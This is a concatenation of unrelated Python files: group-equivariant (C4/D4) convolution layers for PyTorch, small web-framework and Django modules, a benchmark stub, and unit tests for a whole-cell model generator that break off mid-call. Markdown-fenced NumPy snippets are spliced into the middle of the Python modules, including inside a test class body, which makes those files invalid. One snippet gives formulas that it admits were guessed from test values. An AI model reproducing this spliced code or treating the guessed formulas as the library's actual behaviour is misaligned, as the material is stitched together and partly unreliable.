        # Each output fiber g pairs a cyclic shift of the group axis with a
        # spatial rotation of the 3x3 stencil by g * 90 degrees.
        weight = torch.zeros(self.out_channels, 4, self.in_channels, 4, 3, 3).to(x.device)
        weight[:, 0, ...] = self.weight
        weight[:, 1, ...] = torch.rot90(self.weight[..., [3, 0, 1, 2], :, :], 1, [3, 4])
        weight[:, 2, ...] = torch.rot90(self.weight[..., [2, 3, 0, 1], :, :], 2, [3, 4])
        weight[:, 3, ...] = torch.rot90(self.weight[..., [1, 2, 3, 0], :, :], 3, [3, 4])
        x = torch.nn.functional.conv2d(x, weight.reshape(self.out_channels * 4, self.in_channels * 4, 3, 3), padding=1)
        if self.stride != 1:
            x = self.pool(x)
        if self.bias is not None:
            b, c, h, w = x.shape  # was unpacked as (b, c, w, h), silently swapping the names
            x = (x.reshape(b, c // 4, 4, h, w) + self.bias.reshape(1, -1, 1, 1, 1)).reshape(x.shape)
        return x


class C_4_BN(nn.Module):
    def __init__(self, in_channels):
        super(C_4_BN, self).__init__()
        self.bn = nn.BatchNorm3d(in_channels)

    def forward(self, x):
        b, c, h, w = x.shape
        return self.bn(x.reshape(b, c // 4, 4, h, w)).reshape(x.size())


class D_4_BN(nn.Module):
    def __init__(self, in_channels, momentum=0.1):
        super(D_4_BN, self).__init__()
        self.bn = nn.BatchNorm3d(in_channels, momentum=momentum)

    def forward(self, x):
        b, c, h, w = x.shape
        return self.bn(x.reshape(b, c // 8, 8, h, w)).reshape(x.size())


class C_4_1x1_(nn.Module):
    def __init__(self, in_channels, out_channels):
        super(C_4_1x1_, self).__init__()
        self.net = nn.Conv3d(in_channels, out_channels, 1, bias=True)
        self.in_channels = in_channels
        self.out_channels = out_channels

    def forward(self, x):
        b, c, h, w = x.shape
        x = self.net(x.view(b, c // 4, 4, h, w)).reshape(b, self.out_channels * 4, h, w)
        return x


class E4_C4(nn.Module):
    def __init__(self,
                 in_channels,
                 out_channels,
                 kernel_size,
                 reduction_ratio=2,
                 groups=1,
                 stride=1):
        super(E4_C4, self).__init__()
        self.kernel_size = kernel_size
        self.stride = stride
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.reduction_ratio = reduction_ratio
        self.group_channels = groups
        self.groups = self.out_channels // self.group_channels
        self.dim_g = 4
        self.v = nn.Sequential(C_4_1x1(in_channels, out_channels))
        self.conv1 = nn.Sequential(C_4_1x1(in_channels, int(in_channels // reduction_ratio)),
                                   nn.GroupNorm(int(in_channels // reduction_ratio),
                                                int(in_channels // reduction_ratio) * 4),
                                   nn.ReLU())
        self.conv2 = nn.Sequential(C_4_1x1_(int(in_channels // reduction_ratio), kernel_size ** 2 * self.groups))
        if stride > 1:
            self.avgpool = nn.AvgPool2d(stride, stride)
        self.unfold = nn.Unfold(kernel_size, 1, (kernel_size - 1) // 2, stride)

    def forward(self, x):
        # Predict a spatially varying (involution-style) kernel, then make it
        # C4-equivariant by rotating the kernel slice for each group element.
        weight = self.conv2(self.conv1(x if self.stride == 1 else self.avgpool(x)))
        b, c, h, w = weight.shape
        weight = weight.view(b, self.groups, self.kernel_size, self.kernel_size, 4, h, w)
        weight[:, :, :, :, 1] = torch.rot90(weight[:, :, :, :, 1], 1, [2, 3])
        weight[:, :, :, :, 2] = torch.rot90(weight[:, :, :, :, 2], 2, [2, 3])
        weight[:, :, :, :, 3] = torch.rot90(weight[:, :, :, :, 3], 3, [2, 3])
        weight = weight.reshape(b, self.groups, self.kernel_size ** 2, 4, h, w).unsqueeze(2).transpose(3, 4)
        x = self.v(x)
        out = self.unfold(x).view(b, self.groups, self.group_channels, 4, self.kernel_size ** 2, h, w)
        out = (weight * out).sum(dim=4).view(b, self.out_channels * 4, h, w)
        return out


class D_4_1x1(nn.Module):
    def __init__(self, in_channels, out_channels, stride=1):
        super(D_4_1x1, self).__init__()
        self.in_channels = in_channels
        self.out_channels = out_channels
        weight = torch.randn(out_channels, in_channels, 8) / math.sqrt(8 * in_channels / 2)
        self.weight = torch.nn.Parameter(weight)
        self.stride = stride
        self.pool = nn.MaxPool2d(2, 2)

    def forward(self, x):
        weight = torch.zeros(self.out_channels, 8, self.in_channels, 8).to(x.device)
        weight[:, 0, ...] = self.weight
        weight[:, 1, ...] = self.weight[..., [3, 0, 1, 2, 5, 6, 7, 4]]
        weight[:, 2, ...] = self.weight[..., [2, 3, 0, 1, 6, 7, 4, 5]]
        weight[:, 3, ...] = self.weight[..., [1, 2, 3, 0, 7, 4, 5, 6]]
        weight[:, 4, ...] = self.weight[..., [4, 5, 6, 7, 0, 1, 2, 3]]
        weight[:, 5, ...] = self.weight[..., [5, 6, 7, 4, 3, 0, 1, 2]]
        weight[:, 6, ...] = self.weight[..., [6, 7, 4, 5, 2, 3, 0, 1]]
        weight[:, 7, ...] = self.weight[..., [7, 4, 5, 6, 1, 2, 3, 0]]
        x = torch.nn.functional.conv2d(x, weight.reshape(self.out_channels * 8, self.in_channels * 8, 1, 1),
                                       stride=1, padding=0)
        if self.stride != 1:
            x = self.pool(x)
        return x


class D_4_3x3(nn.Module):
    def __init__(self, in_channels, out_channels, bias=False, stride=1):
        super(D_4_3x3, self).__init__()
        self.in_channels = in_channels
        self.out_channels = out_channels
        weight = torch.randn(out_channels, in_channels, 8, 3, 3) / math.sqrt(8 * in_channels * 9 / 2)
        self.weight = torch.nn.Parameter(weight)
        self.pool = nn.MaxPool2d(2, 2)
        self.stride = stride
        self.bias = None
        if bias:
            self.bias = torch.nn.Parameter(torch.randn(out_channels))

    def forward(self, x):
        # Fibers 0-3 are the rotations, fibers 4-7 the mirrored rotations of D4.
        weight = torch.zeros(self.out_channels, 8, self.in_channels, 8, 3, 3).to(x.device)
        weight[:, 0, ...] = self.weight
        weight[:, 1, ...] = torch.rot90(self.weight[..., [3, 0, 1, 2, 5, 6, 7, 4], :, :], 1, [3, 4])
        weight[:, 2, ...] = torch.rot90(self.weight[..., [2, 3, 0, 1, 6, 7, 4, 5], :, :], 2, [3, 4])
        weight[:, 3, ...] = torch.rot90(self.weight[..., [1, 2, 3, 0, 7, 4, 5, 6], :, :], 3, [3, 4])
        weight[:, 4, ...] = torch.rot90(self.weight[..., [4, 5, 6, 7, 0, 1, 2, 3], :, :].transpose(3, 4), 3, [3, 4])
        weight[:, 5, ...] = torch.rot90(self.weight[..., [5, 6, 7, 4, 3, 0, 1, 2], :, :].transpose(3, 4), 2, [3, 4])
        weight[:, 6, ...] = torch.rot90(self.weight[..., [6, 7, 4, 5, 2, 3, 0, 1], :, :].transpose(3, 4), 1, [3, 4])
        weight[:, 7, ...] = torch.rot90(self.weight[..., [7, 4, 5, 6, 1, 2, 3, 0], :, :].transpose(3, 4), 0, [3, 4])
        x = torch.nn.functional.conv2d(x, weight.reshape(self.out_channels * 8, self.in_channels * 8, 3, 3), padding=1)
        if self.stride != 1:
            x = self.pool(x)
        if self.bias is not None:
            b, c, h, w = x.shape  # was unpacked as (b, c, w, h), silently swapping the names
            x = (x.reshape(b, c // 8, 8, h, w) + self.bias.reshape(1, -1, 1, 1, 1)).reshape(x.shape)
        return x


class D_4_1x1_(nn.Module):
    def __init__(self, in_channels, out_channels):
        super(D_4_1x1_, self).__init__()
        self.net = nn.Conv3d(in_channels, out_channels, 1, bias=True)
        self.in_channels = in_channels
        self.out_channels = out_channels

    def forward(self, x):
        b, c, h, w = x.shape
        x = self.net(x.view(b, c // 8, 8, h, w)).reshape(b, self.out_channels * 8, h, w)
        return x


class E4_D4(nn.Module):
    def __init__(self,
                 in_channels,
                 out_channels,
                 kernel_size,
                 reduction_ratio=2,
                 groups=1,
                 stride=1):
        super(E4_D4, self).__init__()
        self.kernel_size = kernel_size
        self.stride = stride
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.reduction_ratio = reduction_ratio
        self.group_channels = groups
        self.groups = self.out_channels // self.group_channels
        self.dim_g = 8
        self.v = nn.Sequential(D_4_1x1(in_channels, out_channels))
        self.conv1 = nn.Sequential(D_4_1x1(in_channels, int(in_channels // reduction_ratio)),
                                   nn.GroupNorm(int(in_channels // reduction_ratio),
                                                int(in_channels // reduction_ratio) * 8),
                                   nn.ReLU())
        self.conv2 = nn.Sequential(D_4_1x1_(int(in_channels // reduction_ratio), kernel_size ** 2 * self.groups))
        if stride > 1:
            self.avgpool = nn.AvgPool2d(stride, stride)
        self.unfold = nn.Unfold(kernel_size, 1, (kernel_size - 1) // 2, stride)

    def forward(self, x):
        weight = self.conv2(self.conv1(x if self.stride == 1 else self.avgpool(x)))
        b, c, h, w = weight.shape
        weight = weight.view(b, self.groups, self.kernel_size, self.kernel_size, 8, h, w)
        weight[:, :, :, :, 1] = torch.rot90(weight[:, :, :, :, 1], 1, [2, 3])
        weight[:, :, :, :, 2] = torch.rot90(weight[:, :, :, :, 2], 2, [2, 3])
        weight[:, :, :, :, 3] = torch.rot90(weight[:, :, :, :, 3], 3, [2, 3])
        weight[:, :, :, :, 4] = torch.rot90(weight[:, :, :, :, 4].transpose(2, 3), 3, [2, 3])
        weight[:, :, :, :, 5] = torch.rot90(weight[:, :, :, :, 5].transpose(2, 3), 2, [2, 3])
        weight[:, :, :, :, 6] = torch.rot90(weight[:, :, :, :, 6].transpose(2, 3), 1, [2, 3])
        weight[:, :, :, :, 7] = torch.rot90(weight[:, :, :, :, 7].transpose(2, 3), 0, [2, 3])
        weight = weight.view(b, self.groups, self.kernel_size ** 2, 8, h, w).unsqueeze(2).transpose(3, 4)
        x = self.v(x)
        out = self.unfold(x).view(b, self.groups, self.group_channels, 8, self.kernel_size ** 2, h, w)
        out = (weight * out).sum(dim=4).view(b, self.out_channels * 8, h, w)
        return out


def C_4_rot(x):
    # Action of the 90-degree rotation on a C4 feature map: cyclically shift
    # the group axis, then rotate the spatial axes.
    b, c, h, w = x.shape
    return torch.rot90(x.view(b, c // 4, 4, h, w)[:, :, [3, 0, 1, 2]], 1, [3, 4]).reshape(x.shape)


def D_4_rot(x):
    b, c, h, w = x.shape
    return torch.rot90(x.view(b, c // 8, 8, h, w)[:, :, [3, 0, 1, 2, 5, 6, 7, 4]], 1, [3, 4]).reshape(x.shape)


def D_4_m(x):
    # Action of the mirror generator on a D4 feature map.
    b, c, h, w = x.shape
    return torch.rot90(x.view(b, c // 8, 8, h, w)[:, :, [4, 5, 6, 7, 0, 1, 2, 3]].transpose(3, 4), 3,
                       [3, 4]).reshape(x.shape)


class C_4_Conv(nn.Module):
    def __init__(self, in_channels, out_channels):
        super(C_4_Conv, self).__init__()
        self.in_channels = in_channels
        self.out_channels = out_channels
        weight = torch.randn(out_channels, in_channels, 3, 3) / math.sqrt(9 * in_channels / 2)
        self.weight = torch.nn.Parameter(weight)

    def forward(self, input):
        # Lifting convolution: correlate with the four rotated copies of the kernel.
        weight = torch.zeros(self.out_channels, 4, self.in_channels, 3, 3).to(input.device)
        weight[:, 0] = self.weight
        weight[:, 1] = torch.rot90(self.weight, 1, [2, 3])
        weight[:, 2] = torch.rot90(self.weight, 2, [2, 3])
        weight[:, 3] = torch.rot90(self.weight, 3, [2, 3])
        out = nn.functional.conv2d(input, weight.reshape(self.out_channels * 4, self.in_channels, 3, 3), padding=1)
        return out
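# C_4_Conv is a lifting convolution: correlating a rotated image reproduces the
# original four responses, cyclically shifted along the group axis and rotated
# spatially, which is exactly the action C_4_rot applies. A dependency-light
# sketch of that identity with a hand-rolled 'valid' cross-correlation (NumPy
# only, so it runs without PyTorch):

```python
import numpy as np

def corr2d(img, ker):
    # 'valid' 2-D cross-correlation (what conv2d computes, without padding)
    k = ker.shape[0]
    out = np.empty((img.shape[0] - k + 1, img.shape[1] - k + 1))
    for i in range(out.shape[0]):
        for j in range(out.shape[1]):
            out[i, j] = np.sum(img[i:i + k, j:j + k] * ker)
    return out

rng = np.random.default_rng(0)
img = rng.standard_normal((6, 6))  # square input, so rot90 preserves the shape
w = rng.standard_normal((3, 3))

ys = [corr2d(img, np.rot90(w, g)) for g in range(4)]                # lifted responses
ys_rot = [corr2d(np.rot90(img), np.rot90(w, g)) for g in range(4)]  # rotated input

# Equivariance: fiber g of the rotated input equals rot90 of fiber (g - 1) mod 4,
# i.e. the permute-then-rotate action implemented by C_4_rot above.
equivariant = all(np.allclose(ys_rot[g], np.rot90(ys[(g - 1) % 4])) for g in range(4))
```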


class D_4_Conv(nn.Module):
    def __init__(self, in_channels, out_channels):
        super(D_4_Conv, self).__init__()
        self.in_channels = in_channels
        self.out_channels = out_channels
        weight = torch.randn(out_channels, in_channels, 3, 3) / math.sqrt(9 * in_channels / 2)
        self.weight = torch.nn.Parameter(weight)

    def forward(self, input):
        # Lifting convolution for D4: four rotations plus four mirrored rotations.
        weight = torch.zeros(self.out_channels, 8, self.in_channels, 3, 3).to(input.device)
        weight[:, 0] = self.weight
        weight[:, 1] = torch.rot90(self.weight, 1, [2, 3])
        weight[:, 2] = torch.rot90(self.weight, 2, [2, 3])
        weight[:, 3] = torch.rot90(self.weight, 3, [2, 3])
        weight[:, 4] = torch.rot90(self.weight.transpose(2, 3), 3, [2, 3])
        weight[:, 5] = torch.rot90(self.weight.transpose(2, 3), 2, [2, 3])
        weight[:, 6] = torch.rot90(self.weight.transpose(2, 3), 1, [2, 3])
        weight[:, 7] = torch.rot90(self.weight.transpose(2, 3), 0, [2, 3])
        out = nn.functional.conv2d(input, weight.reshape(self.out_channels * 8, self.in_channels, 3, 3), padding=1)
        return out


class C_4_Pool(nn.Module):
    def __init__(self):
        super(C_4_Pool, self).__init__()
        self.pool = nn.MaxPool3d((4, 1, 1), (4, 1, 1))

    def forward(self, x):
        b, c, h, w = x.shape
        return self.pool(x.reshape(b, c // 4, 4, h, w)).squeeze(2)


class D_4_Pool(nn.Module):
    def __init__(self):
        super(D_4_Pool, self).__init__()
        self.pool = nn.MaxPool3d((8, 1, 1), (8, 1, 1))

    def forward(self, x):
        b, c, h, w = x.shape
        return self.pool(x.reshape(b, c // 8, 8, h, w)).squeeze(2)

# === rivr/http/__init__.py (rivrproject/rivr, BSD-2-Clause-FreeBSD license) ===
from rivr.http.request import Request
from rivr.http.response import (
    Http404,
    Response,
    ResponseNoContent,
    ResponseNotAllowed,
    ResponseNotFound,
    ResponseNotModified,
    ResponsePermanentRedirect,
    ResponseRedirect,
)

__all__ = [
    'Request',
    'Http404',
    'Response',
    'ResponseNoContent',
    'ResponseNotAllowed',
    'ResponseNotFound',
    'ResponseNotModified',
    'ResponsePermanentRedirect',
    'ResponseRedirect',
]

# === clases/admin.py (Etxea/gestion_eide_web, MIT license) ===
from django.contrib import admin
from models import *


class ClaseAdmin(admin.ModelAdmin):
    pass


admin.site.register(Clase, ClaseAdmin)

# === data/micro-benchmark/imports/chained_import/from_import.py (vitsalis/pycg-evaluation, Apache-2.0 license) ===
from chained_import import func1


def func2():
    func1()

# === tests/test_utils.py (KarrLab/model_generator, MIT license) ===
""" Tests for utility methods
:Author: Yin Hoon Chew <yinhoon.chew@mssm.edu>
:Date: 2019-02-13
:Copyright: 2019, Karr Lab
:License: MIT
"""
from wc_onto import onto as wc_ontology
from wc_utils.util.units import unit_registry
import wc_model_gen.utils as utils
import math
import scipy.constants
import unittest
import wc_lang


class TestCase(unittest.TestCase):

    def test_calc_avg_syn_rate(self):
        test_rate = utils.calc_avg_syn_rate(0.5, 300., 36000.)
        self.assertAlmostEqual(test_rate, 0.001164872, places=9)

    def test_calc_avg_deg_rate(self):
        test_rate = utils.calc_avg_deg_rate(0.5, 300.)
        self.assertAlmostEqual(test_rate, 0.0011552453009332421, places=16)
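    # The expected values in the two tests above are consistent with first-order
    # degradation plus dilution by growth. These forms are inferred from the
    # numbers alone; the authoritative implementations live in wc_model_gen.utils:

```python
import math

# Assumed forms, reverse-engineered from the expected test values:
#   degradation rate = c_avg * ln(2) / half_life
#   synthesis rate   = c_avg * (ln(2) / half_life + ln(2) / doubling_time)
c_avg, half_life, doubling_time = 0.5, 300.0, 36000.0

deg_rate = c_avg * math.log(2) / half_life
syn_rate = c_avg * (math.log(2) / half_life + math.log(2) / doubling_time)
```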

    def test_test_metabolite_production(self):
        model = wc_lang.Model()
        submodel = wc_lang.Submodel(model=model, id='metabolism')

        compartment = model.compartments.create(id='c')

        for i in ['o2', 'h2o', 'atp']:
            st = model.species_types.create(id=i)
            species = model.species.create(species_type=st, compartment=compartment)
            species.id = species.gen_id()

        R1 = model.reactions.create(submodel=submodel, id='Ex_o2')
        R1.participants.add(model.species.get_one(
            id='o2[c]').species_coefficients.get_or_create(coefficient=1.0))
        R2 = model.reactions.create(submodel=submodel, id='Ex_h2o')
        R2.participants.add(model.species.get_one(
            id='h2o[c]').species_coefficients.get_or_create(coefficient=1.0))
        R3 = model.reactions.create(submodel=submodel, id='Ex_atp')
        R3.participants.add(model.species.get_one(
            id='atp[c]').species_coefficients.get_or_create(coefficient=-1.0))

        biomass_reaction = model.reactions.create(submodel=submodel, id='biomass_reaction')
        biomass_reaction.participants.add(model.species.get_one(
            id='o2[c]').species_coefficients.get_or_create(coefficient=-1.0))
        biomass_reaction.participants.add(model.species.get_one(
            id='h2o[c]').species_coefficients.get_or_create(coefficient=-1.0))
        biomass_reaction.participants.add(model.species.get_one(
            id='atp[c]').species_coefficients.get_or_create(coefficient=1.0))

        submodel.dfba_obj = wc_lang.DfbaObjective(model=model)
        submodel.dfba_obj.id = submodel.dfba_obj.gen_id()
        obj_expression = biomass_reaction.id
        dfba_obj_expression, error = wc_lang.DfbaObjectiveExpression.deserialize(
            obj_expression, {wc_lang.Reaction: {biomass_reaction.id: biomass_reaction}})
        assert error is None, str(error)
        submodel.dfba_obj.expression = dfba_obj_expression

        reaction_bounds = {i.id: (0., 1000.) for i in model.reactions}

        unproducibles, unrecyclables = utils.test_metabolite_production(
            submodel, reaction_bounds, pseudo_reactions=['biomass_reaction'])
        self.assertEqual(unproducibles, [])
        self.assertEqual(unrecyclables, [])

        unproducibles, unrecyclables = utils.test_metabolite_production(submodel, reaction_bounds)
        self.assertEqual(unproducibles, [])
        self.assertEqual(unrecyclables, [])

        mock1 = model.species.create(id='mock1')
        mock2 = model.species.create(id='mock2')
        biomass_reaction.participants.add(mock1.species_coefficients.get_or_create(coefficient=1.0))
        biomass_reaction.participants.add(mock2.species_coefficients.get_or_create(coefficient=-1.0))

        unproducibles, unrecyclables = utils.test_metabolite_production(submodel, reaction_bounds)
        self.assertEqual(unproducibles, ['mock2'])
        self.assertEqual(unrecyclables, ['mock1'])

        unproducibles, unrecyclables = utils.test_metabolite_production(
            submodel, reaction_bounds, pseudo_reactions=['biomass_reaction'],
            test_producibles=['mock1'], test_recyclables=['mock2'])
        self.assertEqual(unproducibles, ['mock1'])
        self.assertEqual(unrecyclables, ['mock2'])

        unproducibles, unrecyclables = utils.test_metabolite_production(
            submodel, reaction_bounds, test_producibles=['mock1'], test_recyclables=['mock2'])
        self.assertEqual(unproducibles, [])
        self.assertEqual(unrecyclables, [])

        R4 = model.reactions.create(submodel=submodel, id='Ex_mock1')
        R4.participants.add(mock1.species_coefficients.get_or_create(coefficient=-1.0))
        R5 = model.reactions.create(submodel=submodel, id='Ex_mock2')
        R5.participants.add(mock2.species_coefficients.get_or_create(coefficient=1.0))
        reaction_bounds = {i.id: (0., 1000.) for i in model.reactions}

        unproducibles, unrecyclables = utils.test_metabolite_production(submodel, reaction_bounds)
        self.assertEqual(unproducibles, [])
        self.assertEqual(unrecyclables, [])

    def test_simple_repressor(self):
        model = wc_lang.Model()

        init_volume = wc_lang.core.InitVolume(distribution=wc_ontology['WC:normal_distribution'], mean=0.5, std=0)
        c = wc_lang.Compartment(id='c', init_volume=init_volume)
        c.init_density = wc_lang.Parameter(id='density_' + c.id, value=1.)

        volume = wc_lang.Function(id='volume_' + c.id)
        volume.expression, error = wc_lang.FunctionExpression.deserialize(f'{c.id} / {c.init_density.id}', {
            wc_lang.Compartment: {c.id: c},
            wc_lang.Parameter: {c.init_density.id: c.init_density},
        })
        assert error is None, str(error)

        tf_species_type = wc_lang.SpeciesType(id='Repressor')
        tf_species = wc_lang.Species(species_type=tf_species_type, compartment=c)
        tf_species.id = tf_species.gen_id()
        wc_lang.DistributionInitConcentration(species=tf_species, mean=0.5)

        F_rep, species, parameters, functions = utils.simple_repressor(model, 'transcription_rna1', tf_species)

        self.assertEqual(F_rep, '(1 / (1 + Repressor[c] / (Kr_transcription_rna1_Repressor * Avogadro * volume_c)))')
        self.assertEqual(species, {'Repressor[c]': tf_species})
        self.assertEqual(functions, {'volume_c': volume})
        self.assertEqual(set(model.parameters), set(parameters.values()))
        self.assertEqual(sorted(list(parameters.keys())), sorted(['Avogadro', 'Kr_transcription_rna1_Repressor']))
        self.assertEqual(model.parameters.get_one(id='Kr_transcription_rna1_Repressor').type, None)
        self.assertEqual(model.parameters.get_one(id='Kr_transcription_rna1_Repressor').units,
                         unit_registry.parse_units('M'))
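    # Numerically, the regulation factor asserted above is a saturating
    # repression curve in copy-number units. A quick sketch with illustrative
    # (assumed) values for the dissociation constant and compartment volume:

```python
# F_rep = 1 / (1 + [R] / (Kr * N_A * V)): equals 1 with no repressor and
# approaches 0 as repressor copies accumulate.
N_A = 6.02214076e23   # Avogadro's number, 1/mol
V = 0.5e-15           # compartment volume in L (assumed)
Kr = 1e-9             # repressor dissociation constant in M (assumed)

half_sat = Kr * N_A * V  # repressor copy number at which F_rep = 0.5
f_none = 1 / (1 + 0 / half_sat)
f_half = 1 / (1 + half_sat / half_sat)
f_lots = 1 / (1 + 100 * half_sat / half_sat)
```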

    def test_simple_activator(self):
        model = wc_lang.Model()

        init_volume = wc_lang.core.InitVolume(distribution=wc_ontology['WC:normal_distribution'], mean=0.5, std=0)
        c = wc_lang.Compartment(id='c', init_volume=init_volume)
        c.init_density = wc_lang.Parameter(id='density_' + c.id, value=1.)

        volume = wc_lang.Function(id='volume_' + c.id)
        volume.expression, error = wc_lang.FunctionExpression.deserialize(f'{c.id} / {c.init_density.id}', {
            wc_lang.Compartment: {c.id: c},
            wc_lang.Parameter: {c.init_density.id: c.init_density},
        })
        assert error is None, str(error)

        tf_species_type = wc_lang.SpeciesType(id='Activator')
        tf_species = wc_lang.Species(species_type=tf_species_type, compartment=c)
        tf_species.id = tf_species.gen_id()
        wc_lang.DistributionInitConcentration(species=tf_species, mean=0.5)

        F_act, species, parameters, functions = utils.simple_activator(model, 'transcription_rna1', tf_species)

        self.assertEqual(F_act, '((1 + Activator[c] / (Ka_transcription_rna1_Activator * Avogadro * volume_c) * f_transcription_rna1_Activator) / '
                         '(1 + Activator[c] / (Ka_transcription_rna1_Activator * Avogadro * volume_c)))')
        self.assertEqual(species, {'Activator[c]': tf_species})
        self.assertEqual(functions, {'volume_c': volume})
        self.assertEqual(set(model.parameters), set(parameters.values()))
        self.assertEqual(sorted(list(parameters.keys())),
                         sorted(['Avogadro', 'f_transcription_rna1_Activator', 'Ka_transcription_rna1_Activator']))
        self.assertEqual(model.parameters.get_one(id='Ka_transcription_rna1_Activator').type, None)
        self.assertEqual(model.parameters.get_one(id='Ka_transcription_rna1_Activator').units,
                         unit_registry.parse_units('M'))

    def test_gen_michaelis_menten_like_rate_law(self):
        model = wc_lang.Model()

        init_volume = wc_lang.core.InitVolume(distribution=wc_ontology['WC:normal_distribution'], mean=0.5, std=0)
        c = wc_lang.Compartment(id='c', init_volume=init_volume)
        c.init_density = wc_lang.Parameter(id='density_' + c.id, value=1.)

        volume = wc_lang.Function(id='volume_' + c.id)
        volume.expression, error = wc_lang.FunctionExpression.deserialize(f'{c.id} / {c.init_density.id}', {
            wc_lang.Compartment: {c.id: c},
            wc_lang.Parameter: {c.init_density.id: c.init_density},
        })
        assert error is None, str(error)

        species_types = {}
        species = {}
        for i in range(1, 7):
            Id = 's' + str(i)
            species_types[Id] = wc_lang.SpeciesType(id=Id)
            species[Id + '[c]'] = wc_lang.Species(species_type=species_types[Id], compartment=c)
            species[Id + '[c]'].id = species[Id + '[c]'].gen_id()
            wc_lang.DistributionInitConcentration(species=species[Id + '[c]'], mean=0.5)

        ob_exp1, error = wc_lang.ObservableExpression.deserialize('s4[c] + s5[c]', {
            wc_lang.Species: {species['s4[c]'].gen_id(): species['s4[c]'],
                              species['s5[c]'].gen_id(): species['s5[c]']}})
        assert error is None, str(error)
        modifier1 = wc_lang.Observable(id='e1', expression=ob_exp1)

        ob_exp2, error = wc_lang.ObservableExpression.deserialize('2 * s6[c]', {
            wc_lang.Species: {species['s6[c]'].gen_id(): species['s6[c]']}})
        assert error is None, str(error)
        modifier2 = wc_lang.Observable(id='e2', expression=ob_exp2)

        participant1 = wc_lang.SpeciesCoefficient(species=species['s1[c]'], coefficient=-1)
        participant2 = wc_lang.SpeciesCoefficient(species=species['s2[c]'], coefficient=-1)
        participant3 = wc_lang.SpeciesCoefficient(species=species['s3[c]'], coefficient=1)
        participant4 = wc_lang.SpeciesCoefficient(species=species['s4[c]'], coefficient=-1)
        participant5 = wc_lang.SpeciesCoefficient(species=species['s4[c]'], coefficient=1)
        participant6 = wc_lang.SpeciesCoefficient(species=species['s6[c]'], coefficient=-1)
        participant7 = wc_lang.SpeciesCoefficient(species=species['s6[c]'], coefficient=-1)
        participant8 = wc_lang.SpeciesCoefficient(species=species['s6[c]'], coefficient=1)

        reaction = wc_lang.Reaction(id='r1', participants=[participant1, participant2, participant3,
                                                           participant4, participant5, participant6,
                                                           participant7, participant8])

        rate_law, parameters = utils.gen_michaelis_menten_like_rate_law(
            model, reaction, modifiers=[modifier1, modifier2], modifier_reactants=[species['s6[c]']])
        self.assertEqual(rate_law.expression, 'k_cat_r1 * e1 * e2 * '
                         '(s1[c] / (s1[c] + K_m_r1_s1 * Avogadro * volume_c)) * '
                         '(s2[c] / (s2[c] + K_m_r1_s2 * Avogadro * volume_c)) * '
                         '(s6[c] / (s6[c] + K_m_r1_s6 * Avogadro * volume_c))')
        self.assertEqual(set([i.gen_id() for i in rate_law.species]), set(['s1[c]', 's2[c]', 's6[c]']))
        self.assertEqual(set(rate_law.observables), set([modifier1, modifier2]))
        self.assertEqual(set(rate_law.parameters), set(parameters))
        self.assertEqual(rate_law.parameters.get_one(id='k_cat_r1').type, wc_ontology['WC:k_cat'])
        self.assertEqual(rate_law.parameters.get_one(id='k_cat_r1').units,
                         unit_registry.parse_units('s^-1 molecule^-2'))
        self.assertEqual(rate_law.parameters.get_one(id='K_m_r1_s2').type, wc_ontology['WC:K_m'])
        self.assertEqual(rate_law.parameters.get_one(id='K_m_r1_s2').units, unit_registry.parse_units('M'))

        reaction = wc_lang.Reaction(id='r1', participants=[participant1, participant2, participant4, participant8])
        rate_law, parameters = utils.gen_michaelis_menten_like_rate_law(
            model, reaction)
        self.assertEqual(rate_law.expression, 'k_cat_r1 * '
                         '(s1[c] / (s1[c] + K_m_r1_s1 * Avogadro * volume_c)) * '
                         '(s2[c] / (s2[c] + K_m_r1_s2 * Avogadro * volume_c)) * '
                         '(s4[c] / (s4[c] + K_m_r1_s4 * Avogadro * volume_c))')

        reaction = wc_lang.Reaction(id='r1', participants=[participant3])
        rate_law, parameters = utils.gen_michaelis_menten_like_rate_law(
            model, reaction)
        self.assertEqual(rate_law.expression, 'k_cat_r1')

        reaction = wc_lang.Reaction(id='r1', participants=[participant3, participant6])
        rate_law, parameters = utils.gen_michaelis_menten_like_rate_law(
            model, reaction, modifiers=[modifier1, species['s6[c]']])
        self.assertEqual(rate_law.expression, 'k_cat_r1 * e1 * s6[c]')

        reaction = wc_lang.Reaction(id='r1', participants=[participant1, participant2, participant4, participant8])
        rate_law, parameters = utils.gen_michaelis_menten_like_rate_law(
            model, reaction, exclude_substrates=[species['s1[c]']])
        self.assertEqual(rate_law.expression, 'k_cat_r1 * '
                         '(s2[c] / (s2[c] + K_m_r1_s2 * Avogadro * volume_c)) * '
                         '(s4[c] / (s4[c] + K_m_r1_s4 * Avogadro * volume_c))')

        with self.assertRaises(TypeError) as ctx:
            rate_law, parameters = utils.gen_michaelis_menten_like_rate_law(
                model, reaction, modifiers=['s6[c]'])
        self.assertEqual('The modifiers contain element(s) that is not an observable or a species', str(ctx.exception))

    def test_gen_michaelis_menten_like_propensity_function(self):
        model = wc_lang.Model()

        init_volume = wc_lang.core.InitVolume(distribution=wc_ontology['WC:normal_distribution'], mean=0.5, std=0)
        c = wc_lang.Compartment(id='c', init_volume=init_volume)
        c.init_density = wc_lang.Parameter(id='density_' + c.id, value=1.)

        volume = wc_lang.Function(id='volume_' + c.id)
        volume.expression, error = wc_lang.FunctionExpression.deserialize(f'{c.id} / {c.init_density.id}', {
            wc_lang.Compartment: {c.id: c},
            wc_lang.Parameter: {c.init_density.id: c.init_density},
        })
        assert error is None, str(error)

        species_types = {}
        species = {}
        for i in range(1, 7):
            Id = 's' + str(i)
            species_types[Id] = wc_lang.SpeciesType(id=Id)
            model_species = wc_lang.Species(species_type=species_types[Id], compartment=c)
            model_species.id = model_species.gen_id()
            species[Id + '_c'] = model_species
            wc_lang.DistributionInitConcentration(species=species[Id + '_c'], mean=0.5)

        participant1 = wc_lang.SpeciesCoefficient(species=species['s1_c'], coefficient=-1)
        participant2 = wc_lang.SpeciesCoefficient(species=species['s2_c'], coefficient=-1)
        participant3 = wc_lang.SpeciesCoefficient(species=species['s3_c'], coefficient=-1)
        participant4 = wc_lang.SpeciesCoefficient(species=species['s4_c'], coefficient=-1)
        participant5 = wc_lang.SpeciesCoefficient(species=species['s5_c'], coefficient=1)
        participant6 = wc_lang.SpeciesCoefficient(species=species['s6_c'], coefficient=1)

        reaction = wc_lang.Reaction(id='r1', participants=[participant1, participant2, participant3,
                                                           participant4, participant5, participant6])

        with self.assertRaises(ValueError):
            rate_law1, parameters = utils.gen_michaelis_menten_like_propensity_function(
                model, reaction)

        rate_law2, parameters = utils.gen_michaelis_menten_like_propensity_function(
